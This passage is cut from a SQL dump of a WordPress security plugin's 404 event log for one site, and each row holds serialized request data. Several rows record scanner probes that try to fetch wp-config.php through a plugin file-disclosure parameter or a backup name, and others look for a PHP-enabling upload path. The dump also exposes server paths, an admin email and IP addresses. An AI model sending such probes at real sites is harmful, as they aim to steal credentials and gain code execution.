Firefox/64.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/wp-config.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:14:\"/wp-config.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xaim5TieCxd@dgmfOaccnQAAAIQ\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/wp-config.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/wp-config.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xaim5TieCxd@dgmfOaccnQAAAIQ\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"91.121.54.71\";s:11:\"REMOTE_PORT\";s:5:\"40528\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/wp-config.php\";s:10:\"SCRIPT_URL\";s:14:\"/wp-config.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xaim5TieCxd@dgmfOaccnQAAAIQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571333861.9245\";s:12:\"REQUEST_TIME\";s:10:\"1571333861\";}}','notice','2019-10-17 17:37:50','2019-10-17 17:37:42',35013240,36818976,'https://bintara.com.my/wp-config.php?aam-media=1',1,0,'91.121.54.71'),(28230,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.92 Safari/537.36 42885\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"137.74.4.69\";s:11:\"REMOTE_PORT\";s:5:\"61010\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaioPjieCxd@dgmfOacdTgAAAJY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571334206.9346\";s:12:\"REQUEST_TIME\";s:10:\"1571334206\";}}','notice','2019-10-17 17:43:30','2019-10-17 17:43:27',35406032,37201800,'https://bintara.com.my/?page_id=18',1,0,'137.74.4.69'),(28231,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/wp-config.php~\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:10:\"HTTP_RANGE\";s:15:\"bytes=0-1000000\";s:12:\"HTTP_REFERER\";s:36:\"http://bintara.com.my/wp-config.php~\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/wp-config.php~\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/wp-config.php~\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaiqGDieCxd@dgmfOaceAAAAAIM\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/wp-config.php~\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/wp-config.php~\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaiqGDieCxd@dgmfOaceAAAAAIM\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"91.121.54.71\";s:11:\"REMOTE_PORT\";s:5:\"59892\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/wp-config.php~\";s:10:\"SCRIPT_URL\";s:15:\"/wp-config.php~\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaiqGDieCxd@dgmfOaceAAAAAIM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571334680.5589\";s:12:\"REQUEST_TIME\";s:10:\"1571334680\";}}','notice','2019-10-17 17:51:24','2019-10-17 17:51:21',35462944,37270472,'https://bintara.com.my/wp-config.php~',1,0,'91.121.54.71'),(28232,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:26:\"/wp-config.php?aam-media=1\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:10:\"HTTP_RANGE\";s:15:\"bytes=0-1000000\";s:12:\"HTTP_REFERER\";s:47:\"http://bintara.com.my/wp-config.php?aam-media=1\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/wp-config.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:14:\"/wp-config.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaiqH1LcgNPEgq@WQH5gEgAAAEs\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/wp-config.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/wp-config.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaiqH1LcgNPEgq@WQH5gEgAAAEs\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"91.121.54.71\";s:11:\"REMOTE_PORT\";s:5:\"36858\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/wp-config.php\";s:10:\"SCRIPT_URL\";s:14:\"/wp-config.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaiqH1LcgNPEgq@WQH5gEgAAAEs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571334687.4276\";s:12:\"REQUEST_TIME\";s:10:\"1571334687\";}}','notice','2019-10-17 17:51:29','2019-10-17 17:51:27',35016656,36822432,'https://bintara.com.my/wp-config.php?aam-media=1',1,0,'91.121.54.71'),(28233,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:9:\"//404.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"818\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"61.26.103.152\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"61.26.103.152\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:29:\"http://bintara.com.my/404.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:8:\"/404.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xai6Sfb4yAloRZFRtQOKVwAAAVQ\";s:12:\"REDIRECT_URL\";s:8:\"/404.asp\";s:11:\"REMOTE_ADDR\";s:13:\"60.161.210.91\";s:11:\"REMOTE_PORT\";s:5:\"64872\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:29:\"http://bintara.com.my/404.asp\";s:10:\"SCRIPT_URL\";s:8:\"/404.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xai6Sfb4yAloRZFRtQOKVwAAAVQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571338825.3654\";s:12:\"REQUEST_TIME\";s:10:\"1571338825\";}}','notice','2019-10-17 19:00:29','2019-10-17 19:00:26',35858312,37656360,'http://bintara.com.my//404.asp',1,0,'61.26.103.152'),(28234,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:132:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 OPR/53.0.2907.68\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"137.74.4.69\";s:11:\"REMOTE_PORT\";s:5:\"55639\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xai6WpmA1jUkTR6fHyQzxwAAAEQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571338842.7239\";s:12:\"REQUEST_TIME\";s:10:\"1571338842\";}}','notice','2019-10-17 19:00:45','2019-10-17 19:00:43',34921872,36731768,'https://bintara.com.my/?page_id=18',1,0,'137.74.4.69'),(28235,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3451.0 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"137.74.4.69\";s:11:\"REMOTE_PORT\";s:5:\"61652\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XajKq04GZAhSKnwjBMzELAAAAAU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571343019.5536\";s:12:\"REQUEST_TIME\";s:10:\"1571343019\";}}','notice','2019-10-17 20:10:21','2019-10-17 20:10:19',34915680,36711872,'https://bintara.com.my/?page_id=18',1,0,'137.74.4.69'),(28236,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:94:\"/mmm/Admincenter/Uploads.upload.allowpath.1.allowext.gif%7Cphp%7Cjpeg%7Cpng%7Cbmp.do?dir=image\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:37:\"text/html, application/xhtml+xml, */*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-CN\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=b3d3b61dece61ad213ce275b20c0fe2d\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:12:\"HTTP_REFERER\";s:116:\"http://bintara.com.my//mmm/Admincenter/Uploads.upload.allowpath.1.allowext.gif%7Cphp%7Cjpeg%7Cpng%7Cbmp.do?dir=image\";s:15:\"HTTP_USER_AGENT\";s:70:\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:9:\"dir=image\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:21:\"REDIRECT_QUERY_STRING\";s:9:\"dir=image\";s:19:\"REDIRECT_SCRIPT_URI\";s:98:\"https://bintara.com.my/mmm/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:19:\"REDIRECT_SCRIPT_URL\";s:76:\"/mmm/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XajKwpmA1jUkTR6fHyQ33gAAAEU\";s:12:\"REDIRECT_URL\";s:76:\"/mmm/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:11:\"49.70.47.85\";s:11:\"REMOTE_PORT\";s:5:\"63708\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:98:\"https://bintara.com.my/mmm/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:10:\"SCRIPT_URL\";s:76:\"/mmm/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XajKwpmA1jUkTR6fHyQ33gAAAEU\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571343043.082\";s:12:\"REQUEST_TIME\";s:10:\"1571343043\";}}','notice','2019-10-17 20:10:44','2019-10-17 20:10:43',34931576,36739952,'https://bintara.com.my/mmm/Admincenter/Uploads.upload.allowpath.1.allowext.gif%7Cphp%7Cjpeg%7Cpng%7Cbmp.do?dir=image',1,0,'49.70.47.85'),(28237,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:97:\"/admsys/Admincenter/Uploads.upload.allowpath.1.allowext.gif%7Cphp%7Cjpeg%7Cpng%7Cbmp.do?dir=image\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:37:\"text/html, application/xhtml+xml, */*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-CN\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=28b7e0cc9c7b003b22fc05fbee9ea0ff\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:12:\"HTTP_REFERER\";s:119:\"http://bintara.com.my//admsys/Admincenter/Uploads.upload.allowpath.1.allowext.gif%7Cphp%7Cjpeg%7Cpng%7Cbmp.do?dir=image\";s:15:\"HTTP_USER_AGENT\";s:70:\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:9:\"dir=image\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:21:\"REDIRECT_QUERY_STRING\";s:9:\"dir=image\";s:19:\"REDIRECT_SCRIPT_URI\";s:101:\"https://bintara.com.my/admsys/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:19:\"REDIRECT_SCRIPT_URL\";s:79:\"/admsys/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XajKyvb4yAloRZFRtQOUvQAAAUE\";s:12:\"REDIRECT_URL\";s:79:\"/admsys/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:11:\"49.70.47.85\";s:11:\"REMOTE_PORT\";s:5:\"64138\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:101:\"https://bintara.com.my/admsys/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:10:\"SCRIPT_URL\";s:79:\"/admsys/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"S